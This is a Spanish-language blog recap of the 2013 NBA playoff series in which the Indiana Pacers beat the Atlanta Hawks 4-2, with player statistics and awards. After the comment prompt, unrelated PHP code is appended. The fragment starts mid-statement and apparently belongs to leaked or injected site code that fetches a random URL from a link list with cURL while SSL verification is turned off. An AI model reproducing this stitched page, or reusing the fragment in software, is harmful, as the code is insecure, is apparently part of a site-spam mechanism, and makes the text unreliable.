Resumen Indiana Pacers 4 – Atlanta Hawks 2

04 de May de 2013 por MagicJohnson32

pacers hawksUn partido más de lo que apuntábamos en la previa han necesitado los Pacers para deshacerse de los Hawks. No podían encontrar un momento más oportuno los de Indianapolis para romper la racha que acumulaban en sus visitas a Atlanta, donde habían caído en 13 ocasiones consecutivas, que anoche, en el sexto encuentro de una serie que hasta el momento sólo conocía victorias locales. Durante los cinco primeros encuentros la eliminatoria había resultado casi rutinaria: dominio abrumador de los Pacers en los tres partidos jugados en Indiana, en los que se impusieron por 18 puntos anotando más de 108 puntos de media, y victorias claras de los Hawks en Atlanta, donde los Pacers sólo promediaron 80 puntos y carecieron de la eficacia defensiva que los eleva por encima de la media. Todo eso fue, como decimos, hasta el sexto partido, en el que la tendencia de la eliminatoria descarriló y, por una vez, los Pacers pudieron imponer su estilo en Atlanta, acabar con la racha negativa y sellar su pase a segunda ronda, donde repiten tras estar cerca de sorprender a los Heat hace un año.

Pese a que los Hawks ganaron sus dos primeros partidos en el Philips Arena y pusieron el 2-2 en la serie, nunca hubo motivos verdaderamente justificados para verlos como ganadores de la eliminatoria. Indiana se había demostrado durante toda la temporada un equipo con más recursos ofensivos y más poderoso defensivamente, y llegados los Playoffs los hombres de Frank Vogel confirmaron la evidencia. Paul George lideró la primera carga, la que situó a los Pacers 2-0, y pese a que su efectividad en el tiro ha sufrido altibajos, siempre ha encontrado vías para contribuir. Cuando George ha estado menos acertado, ahí han estado David West, Hibbert o George Hill, excelentes los tres en el sexto y definitivo partido.

josh horford

Los Hawks han sido, un año más, un equipo previsible y, a la postre, decepcionante. En raras ocasiones alcanzan su potencial y jamás dan ese plus que se requiere en Playoffs. Josh Smith, del que probablemente hayamos visto sus últimos minutos como jugador de Atlanta, apenas dejó una actuación de gran nivel, la del 4º partido, y cerró la serie sumando 10 de 36 en tiros de campo en las dos últimas derrotas. Mejor estuvo Horford, que no repitió los estratosféricos números que firmó en febrero pero que, a diferencia de sus compañeros, mantuvo una regularidad encomiable. Comentábamos en la previa que las posibilidades de Atlanta pasaban por desafiar la teórica superioridad interior de West y Hibbert y dar pista a las transiciones de Teague, Harris y Josh Smith como único camino para superar la defensa de los Pacers. No hay más que echar un vistazo a las cifras reboteadoras para entender la trascendencia que ha tenido este factor en la serie: en las cuatro victorias de Indiana, los Pacers atraparon 63 rebotes más; en las dos derrotas, la cifra se redujo a 3.

En definitiva, el adiós de Josh Smith a Atlanta (si se confirma) habrá sido coherente con su trayectoria en la franquicia. A  los Hawks, tras deshacerse en verano de Joe Johnson, se le abren de par en par las puertas de la reconstrucción: la finalización de los contratos de Smith, Harris, Pachulia, Korver y Petro libera cerca de 40 millones y deja a la franquicia como uno de los principales actores del próximo mercado estival.

Los Pacers se enfrentarán en segunda ronda con el que durante meses fue su rival por la segunda plaza del Este, los Knicks. Será entonces cuando sabremos el techo de este equipo.

PREMIOS

paul george josh smithMVP: aunque no estuvo inspirado en el sexto encuentro, Paul George ha sido el líder de los Pacers a lo largo de la serie, igual que lo fue en la regular season. Sus números lo ratifican: 18,7 puntos, 9,5 rebotes, 5 asistencias y 1,8 robos para el Most Improved Player 2013.

Sorpresa: Lance Stephenson no brilla pero cumple en cada partido. De hecho, en esta serie ha sido uno de los máximos reboteadores y asistentes, y ha dejado números de 7,8 puntos, 8 rebotes, 4,3 asistencias y 1,2 robos por encuentro.

Decepción: el rendimiento de ambos equipos como visitantes, con excepción de la victoria de los Pacers en el sexto, ha resultado decepcionante y no se ha vivido un solo final ajustado. En el plano individual, esperábamos más de Jeff Teague, que empezó fuerte con 21 puntos y 7 asistencias en el encuentro inaugural pero se fue deshinchando hasta dejar su media en 13,3 puntos con un 33%.

Esfuerzo en vano: los Hawks llegan hasta donde les lleven Josh Smith y Horford. El primero ha firmado 17 puntos, 7,5 rebotes, 3,5 asistencias y 1,8 robos, y el segundo 16,7 puntos, 8,8 rebotes, 3 asistencias y 1 robo.

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>